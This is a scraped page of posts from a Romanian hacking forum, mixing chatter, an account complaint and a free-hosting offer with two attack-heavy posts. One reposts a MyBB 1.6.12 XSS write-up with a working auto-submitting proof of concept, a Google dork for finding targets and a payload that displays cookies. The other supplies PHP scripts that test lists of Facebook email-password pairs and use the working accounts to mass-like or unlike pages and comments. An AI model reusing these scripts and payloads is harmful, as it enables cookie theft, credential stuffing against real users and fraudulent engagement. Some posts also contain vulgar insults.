Leaderboard

?i se pare c? vorbeam de altcineva? ?tim cu to?ii c? tu ne-ai dat.. but ...sau cel pu?in eu. uite, ti-am ?i desenat tocmai c? nu-mi pas?... ..doar te-am întrebat dac? era mai bine s? adaug on: bine ai venit!

http://s17.postimg.org/5sce9udhr/Screenshot_from_2014_02_02_17_30_58.png

Cine demonstreaz? cu un printscreen cu RST-ul ?i nicknameul lui c? folose?te Linux (sau orice altceva) ?i nu Windows prime?te Reputa?ie (+rep). Vorbesc serios. FOSS FTW. Numai bine! ps: se accept? trolling doar al?turi de printscreen!

@endemic - cred c? se referea la contact. cui crezi c? ajunge ?

Poate? dau muie

Cu sau fara rep tot eu sunt

Elementary OS Recunosc, dual boot cu win 8. Nu am nevoie de rep.

ei ha http://oi60.tinypic.com/2dhcj8l.jpg

Android e tot Linux.

Android, se pune?

Salutare baieti! Imi pare rau ca va mai incarc baza de date cu inca un cont, sunt TheTime, dar de aproape doua zile nu-mi mai pot accesa contul si as vrea sa aflu ce s-a intamplat. Pe scurt, parola nu-mi mai merge, iar e-mailul folosit pentru inregistrarea contului nu este gasit in baza de date. Parerea mea este ca un admin/moderator a vrut sa-mi faca o gluma interesanta, asa ca a schimbat parola si adresa de mail. Alta explicatie nu gasesc, iar acesta ar fi un abuz de putere, nu? In fine, i-am dat cateva mesaje lui Nytro, i-am explicat ce si cum, dar nu vrea sa-mi deblocheze contul pentru ca nu stiu sa-i spun ce mail am la cont in baza de date. I-as fi spus cu cea mai mare placere, dar nu am de unde sa stiu! Doresc, in primul rand, sa mi se redea accesul la cont. Cat de curand posibil, am fost destul dus cu zaharelul... Apoi, as vrea sa stiu cine a avut ideea geniala sa-mi umble la cont. Mi se pare o copilarie inutila, daca tot detine puterea, ar fi putut sa-mi dea un simplu ban si gata, nu? As fi vazut si eu motivul pentru care am luat ban, m-as fi consolat si gata. Daca respectivul a luat masura dupa cateva pahare de gin, poate sa-si ceara scuze si gata. Daca nu... raman fara cuvinte, mi se face mila. In fine, dupa ce se rezolva totul, puteti sa-mi banati contul asta, "Goddy", pentru ca nu sunt interesat de jocuri de culise si conturi multiple. PS: ca sa-i dovedesc lui Nytro ca eu sunt TheTime, i-am spus cam ce PM-uri am in arhiva si din ce posturi am primit reputatia. Eventual, mai puteti compara IP-uri sau mai veniti cu vreun alt test, dar nu-mi mai cereti din nou mailul pentru ca nu am de unde sa ghicesc cine si in ce l-a schimbat.

du`te in plm cu becali tau, a facut bine din banii care i`a furat..tot banii vostri..daca nu s`ar fura nu ar fi nevoie de oameni sa faca bine, ca toti am sta bine..tara fututa si prosti ca tine o fut

?i ei...

On: Salut si bine ai venit ! Off: In caz de vrei sa faci rau "Invata sa construiesti inainte sa distrugi".

Nimeni nu ma iubeste . P.S.: Multumesc!

MyBB 1.6.12 POST XSS 0day This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given. <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload MyBB throws out a SQL error: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<foo> <h1> <script> alert (bar) () ; //%' LOWER(t.subject) LIKE '%> < prompt \x41 \%42 constructor onload%') This made me analyze and reverse this to find the cause. After filtering out this was the correct input which can cause this error. This part should be constant or’(“\ To reproduce this issue you can add any char value in front on or’(“\ and 2 char values after or’(“\ and you cannot have any spaces in between them. This will be the skeleton: [1 char value]or’(“\[2 char values] Examples: 1or’(“\00 qor’(“\2a You can have a space like this qor’(“\ a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a%') How to Inject JavaScript and HTML? We can inject HTML + JavaScript but the search.php filters out ‘ “ [] – characters. This is the method you could use inject your payload. If we put our constant in the middle we can inject our payload in front and after it. If we inject it at the beginning of the constant the payload will be stored in this manner. [B]<Payload here>[/B]qor’(“\2a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<Payload Here>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') For example if we inject a HTML header at the beginning [B]<h1>Osanda</h1>[/B]qor’(“\2a It will look like this inside the source: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<h1>Osanda</h1>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') Now if we try injecting at the end of our payload it will be stored in two places like this in the source. qor’(“\2a[B]<Payload Here>[/B] The payload is thrown out in the SQL error itself. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOWER(t.subject) LIKE '%\2a<payload here>%')' at line 3 The second place is inside the query. SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a[B]<payload here>%[/B]') Example: This would be an example of JavaScript being interpreted <script>alert(/Osanda/)</script>. Notice that our string is converted to lower case characters due to the SQL query. Remember this filters out ‘ “ [] — characters. Therefore we can use and external script source for performing further client side attacks. Proof of Concept <html> <!-- Exploit-Title: MyBB 1.6.12 POST XSS 0day Google-Dork: inurl:index.php intext:Powered By MyBB Date: Februrary 2nd of 2014 Bug Discovered and Exploit Author: Osanda Malith Jayathissa Vendor Homepage: http://www.mybb.com Software Link: http://resources.mybb.com/downloads/mybb_1612.zip Version: 1.6.12 (older versions might be vulnerbale) Tested on: Windows 8 64-bit Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day --> <body> <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST"> <input type="hidden" name="action" value="do_search" /> <input type="hidden" name="keywords" value="qor'("\2a<script>alert(/XSS/)</script> " /> <script>document.exploit.submit(); </script> </form> </body> </html> POC Video You could do something creative like this in an external source to view the domain, cookies and exploitation beyond the filters. You can define your source like this. <script src=poc />qor'("\2a</script> This will be containing in the poc file. document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/> <h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie); alert('XSS by Osanda & HR'); Thanks to Hood3dRob1n for this idea I have no idea to inject SQL in this bug. You may give it a try and see. Sursa: MyBB 1.6.12 POST XSS 0day | Blog of Osanda Malith

Pentru ca multi stiu ca n-au posibilitatea, dar mai ales pentru ca multumita RST-ului am ajuns unde sunt acum, m-am gandit sa dau ceva inapoi. Din acest moment, orice membru RST, cu cel putin 50 de post-uri de calitate are din partea mea hosting GRATUIT si aici nu ma refer doar la webhosting, ci, in functie de nevoile fiecaruia, inclusiv VPS, VDS, dedicate sau cloud (in curand). Toti membrii care au acum hosting de la mine, din acest moment, sunt scutiti de plata cu conditia ca au un singur serviciu gratuit (spre exemplu, daca aveti 3 servere, unul va fi gartuit de acum inainte). Ideea este ca am fost si eu in papucii vostrii si stiu uneori, cat de greu, daca nu imposibil, va este sa obtineti un webhost sau un server gratuit. Doresc prin aceasta initiativa sa sustin pe cei care au idei, mai ales de business-uri online, sa se ridice. Ca orice cacat moka, trebuie sa avem si 2-3 reguli, de bun simt, evident: 1. NU primiti dedicate decat daca dovediti ca aveti nevoie de ele. 2. NU aveti voie sa gazduiti fisiere de tip audio/video (nici macar pentru streaming) daca nu va apartin. 3. Cine foloseste acest serviciu in scopuri ilegale (d-alea de imi bate diicot-ul la usa) va suferi consecintele. 4. Aveti dreptul la UN SINGUR serviciu moka! 5. IMI REZERV DREPTUL de a respinge pe cei care doresc sa gazduiasca servere de jocuri... La aceste reguli, bineinteles, se adauga si regulamentul de pe site-ul nostru: Serviciile disponibile le gasiti acum pe purehost.ro - Ulltimate hosting sollutions | best anti-DDoS protection | 100% uptime (site-ul este inca in constructie asa ca sa n-aud comentarii). Cei interesati sunt liberi sa ma contacteze pe urmatoarele cai: - PM (mesaj PRIVAT) pe forum - Yahoo!Messenger: th3acidripp3r@yahoo.com - Skype: softguard.datacenter Lista beneficiarilor: yo20063, Eric, em, cheater, sclipici, Cifre, p3tru, Reckon, mad93, robertutzu, Gecko, shaggi, icode, awnly3jhc2g, nSnoopy, hackedss, Wav3 L.E.: NU, NU ofer si domenii GRATIS, wtf guys!

Salut baieti, Nu prea vin eu cu multe contributii pe forum, dar sper sa va ajute. Aveti urmatoarele fisiere: I. verifier.php (Verifica o lista de conturi - users.txt - si selecteaza conturile "bune") <?php /* ######################################################### # Copyright to Zatarra @ rstforums.com # # Use it only with your own accounts! # ######################################################### */ //Initializing cookies folder $directory=getcwd()."/cookies"; //Checking if cookies folder exists if (file_exists($directory)) { //Eating all the cookies to avoid problems echo shell_exec("rm -rf cookies/*.cookie"); } else { //Creating directory echo shell_exec("mkdir cookies"); } $goodone=0; $badone=0; $var=file('users.txt'); for ($i=0;$i<count($var);$i++) { $fb=explode(" ",trim($var[$i])); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, "email=" . @trim($fb[0]) . "&pass=" . @trim($fb[1]) . "&login=Log In"); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEJAR, "cookies/$i.cookie"); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$i.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); @preg_match_all('/data-sigil=(.*?)\>\<table/',$curlData,$rasp); if (@$rasp[1][0]) { echo "[RST] Goodone => ".trim($fb[0])." ".trim($fb[1])."\n"; $goodone++; } /* else { echo "[RST] Badone => ".trim($fb[0])." - ".trim($fb[1])."\n"; $badone++; } */ } echo "Am verificat ".count($var)." conturi dintre care $goodone au fost bune\n"; //Eating all the cookies echo shell_exec("rm -rf cookies/*.cookie"); ?> Metoda de folosire: 1. Creati un fisier users.txt care sa aibe in el, pe fiecare linie, un user (email) si o parola sub forma aceasta: email1@yahoo.com pass1 email2@yahoo.com pass2 email3@yahoo.com pass3 2. Executati fisierul creat anterior (verifier.php) astfel: [root@OptimusPrime RST]# php verifier.php [RST] Goodone => email1@yahoo.com pass1 [RST] Goodone => email2@yahoo.com pass2 [RST] Goodone => email3@yahoo.com pass3 Am verificat 3 conturi dintre care 3 au fost bune [root@OptimusPrime RST]# 3. Toate conturile cu Goodone sunt bune si pot fi folosite pentru script-urile viitoare. Tineti cont de urmatorul fapt: un account este "folosibil" dar daca are urmatoarea setare in facebook: II. like.php (Ofera like-uri unei pagini de facebook - sau unui link - cu conturile predefinite in users.txt) <?php /* ######################################################### # Copyright to Zatarra @ rstforums.com # # Use it only with your own accounts! # ######################################################### */ //The link variable is the only one you have to modify!!! Leave the rest as it is in order to work. $link='https://www.facebook.com/rstforums'; //Initializing cookies folder $directory=getcwd()."/cookies"; //Checking if cookies folder exists if (file_exists($directory)) { //Eating all the cookies to avoid problems echo shell_exec("rm -rf ./cookies/*.cookie"); } else { //Creating directory echo shell_exec("mkdir cookies"); } //Initializing users and passwords $user=file('users.txt'); function login($username,$password) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, "email=" . @$username . "&pass=" . @$password . "&login=Log In"); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEJAR, "cookies/$username.cookie"); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); @preg_match_all('/name=\"fb_dtsg\" value=\"(.*?)\"/',$curlData,$dtsg); //echo "dtsg => ".$dtsg[1][0]."\n"; @preg_match_all('/\"id\":\"(.*?)\"\}\,/',$curlData,$userid); //echo "Profile Id => ".$userid[1][0]."\n"; @preg_match_all('/data-sigil=(.*?)\>\<table/',$curlData,$rasp); if (@$rasp[1][0]) { return array(0,0); } else { return array($dtsg[1][0],$userid[1][0]); } } function like($username,$password,$link) { $userdetails=login($username,$password); if ($userdetails[0]!='0') { $data='fb_dtsg='.$userdetails[0].'&href='.$link.'&action=like&nobootload=&iframe_referer=http://rstforums.com/&ref=&__user='.$userdetails[1].'&__a=1&__dyn=7w&__req=1&ttstamp=265816673977571105'; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://www.facebook.com/plugins/like/connect"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); } } for ($i=0;$i<count($user);$i++) { $fb=explode(" ",trim($user[$i])); like($fb[0],$fb[1],$link); like($fb[0],$fb[1],$link); } //Eating all the cookies echo shell_exec("rm -rf cookies/*.cookie"); ?> Metoda de folosire: 1. Dupa cum scrie si in cod, singurul parametru pe care va indic sa-l modificati este variabila $link 2. Inainte de rulare, puteti sa verificati numarul de like-uri la pagina voastra aici: https://graph.facebook.com/?ids=https://www.facebook.com/rstforums 3. Dupa modificarea link-ului rulati fara nici un argument in consola php like.php 4. Dupa ce s-a oprit reverificati numarul de like-uri. III. dislike.php (Ofera dislike-uri unei pagini de facebook - sau unui link - cu conturile predefinite in users.txt) <?php /* ######################################################### # Copyright to Zatarra @ rstforums.com # # Use it only with your own accounts! # ######################################################### */ //The link variable is the only one you have to modify!!! Leave the rest as it is in order to work. $link='https://www.facebook.com/rstforums'; //Initializing cookies folder $directory=getcwd()."/cookies"; //Checking if cookies folder exists if (file_exists($directory)) { //Eating all the cookies to avoid problems echo shell_exec("rm -rf ./cookies/*.cookie"); } else { //Creating directory echo shell_exec("mkdir cookies"); } //Initializing users and passwords $user=file('users.txt'); function login($username,$password) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, "email=" . @$username . "&pass=" . @$password . "&login=Log In"); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEJAR, "cookies/$username.cookie"); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); @preg_match_all('/name=\"fb_dtsg\" value=\"(.*?)\"/',$curlData,$dtsg); //echo "dtsg => ".$dtsg[1][0]."\n"; @preg_match_all('/\"id\":\"(.*?)\"\}\,/',$curlData,$userid); //echo "Profile Id => ".$userid[1][0]."\n"; @preg_match_all('/data-sigil=(.*?)\>\<table/',$curlData,$rasp); if (@$rasp[1][0]) { return array(0,0); } else { return array($dtsg[1][0],$userid[1][0]); } } function like($username,$password,$link) { $userdetails=login($username,$password); if ($userdetails[0]!='0') { $data='fb_dtsg='.$userdetails[0].'&href='.$link.'&action=like&nobootload=&iframe_referer=http://rstforums.com/&ref=&__user='.$userdetails[1].'&__a=1&__dyn=7w&__req=1&ttstamp=265816673977571105'; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://www.facebook.com/plugins/like/disconnect"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); } } for ($i=0;$i<count($user);$i++) { $fb=explode(" ",trim($user[$i])); like($fb[0],$fb[1],$link); like($fb[0],$fb[1],$link); } //Eating all the cookies echo shell_exec("rm -rf cookies/*.cookie"); ?> Metoda de folosire: 1. Exact la fel ca si like.php 2. Partea cu dislike am facut-o pentru pur si simplul fapt ca sunt unii oameni nesimtiti care dupa ce ii ajuti te iau peste picior sau te ignora, in acest caz este foarte simplu si anume rulezi script-ul de dislike IV. commentlike.php (Da like commenturilor cu useri din users.txt) <?php /* ######################################################### # Copyright to Zatarra @ rstforums.com # # Use it only with your own accounts! # ######################################################### */ //The link variable is the only one you have to modify!!! Leave the rest as it is in order to work. $link='https://www.facebook.com/LinkToYourComment'; @preg_match_all('/sts\/([0-9]*?)\?comment/',$link,$postid); if (!@$postid[1][0]) { @preg_match_all('/fbid=([0-9]*?)\&set/',$link,$postid); } @preg_match_all("/comment_id=([0-9]*?)\&offset/",$link,$commentid); @preg_match_all("/a.([0-9]*?).([0-9]*?).([0-9]*?)\&/",$link,$photo); if (@$photo[2][0]) {$length=strlen($photo[2][0]);} else {$length=5;} //Initializing cookies folder $directory=getcwd()."/cookies"; //Checking if cookies folder exists if (file_exists($directory)) { //Eating all the cookies to avoid problems echo shell_exec("rm -rf ./cookies/*.cookie"); } else { //Creating directory echo shell_exec("mkdir cookies"); } //Initializing users and passwords $user=file('users.txt'); function login($username,$password) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, "email=" . @$username . "&pass=" . @$password . "&login=Log In"); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEJAR, "cookies/$username.cookie"); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); @preg_match_all('/name=\"fb_dtsg\" value=\"(.*?)\"/',$curlData,$dtsg); //echo "dtsg => ".$dtsg[1][0]."\n"; @preg_match_all('/\"id\":\"(.*?)\"\}\,/',$curlData,$userid); //echo "Profile Id => ".$userid[1][0]."\n"; @preg_match_all('/data-sigil=(.*?)\>\<table/',$curlData,$rasp); if (@$rasp[1][0]) { return array(0,0); } else { return array($dtsg[1][0],$userid[1][0]); } } function likecomment($username,$password,$fpostid,$fcommentid,$flength) { $userdetails=login($username,$password); if ($userdetails[0]!='0') { if ($flength==5) { $data='comment_id='.$fpostid.'_'.$fcommentid.'&legacy_id='.$fcommentid.'&like_action=true&ft_ent_identifier='.$fpostid.'&source=2&client_id=1375725162708%3A3550641995&ft[tn]=%3ER0]&__user='.$userdetails[1].'&__a=1&__dyn=7n8ahyj35CFUSt2u5FeDKd8q&__req=q&fb_dtsg='.$userdetails[0].'&ttstamp=26581665371788481'; } else { $data='comment_id='.$fpostid.'_'.$fcommentid.'&legacy_id='.$fcommentid.'&like_action=true&ft_ent_identifier='.$fpostid.'&source=2&client_id=1375725162708%3A3550641995&ft[tn]=%3ER0]&ft[type]=44&nctr[_mod]=photos_snowlift&__user='.$userdetails[1].'&__a=1&__dyn=7n8ahyj35CFUSt2u5FeDKd8q&__req=s&fb_dtsg='.$userdetails[0].'&ttstamp=26581665371788481'; } $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://www.facebook.com/ajax/ufi/comment_like.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); echo $curlData; } } for ($i=0;$i<count($user);$i++) { $fb=explode(" ",trim($user[$i])); likecomment($fb[0],$fb[1],@$postid[1][0],@$commentid[1][0],$length); likecomment($fb[0],$fb[1],@$postid[1][0],@$commentid[1][0],$length); } //Eating all the remain cookies echo shell_exec("rm -rf cookies/*.cookie"); ?> Metoda de folosire: 1. Exact ca la like si dislike doar ca de aceasta data link-ul introdus il luati astfel: Copy la share time 2. Exemplu de copiere al link-ului 3. Atentie, functioneaza doar pentru commenturi nu si posturi pe wall 4. E foarte probabil sa gasiti exceptii. Va rog sa le postati si le voi rezolva Ce va urma in aces thread vor fi urmatoarele: 1. Like la comment - adaugat 2. Like la post pe wall 3. Like la poza 4. Share la un articol Postati orice alta idee in acest thread iar cei care sunt pasionati sau interesati de acest subiect sa ma caute printr-un PM, poate facem o echipa si punem mai multe idei cap la cap. Astept feedback-ul vostru.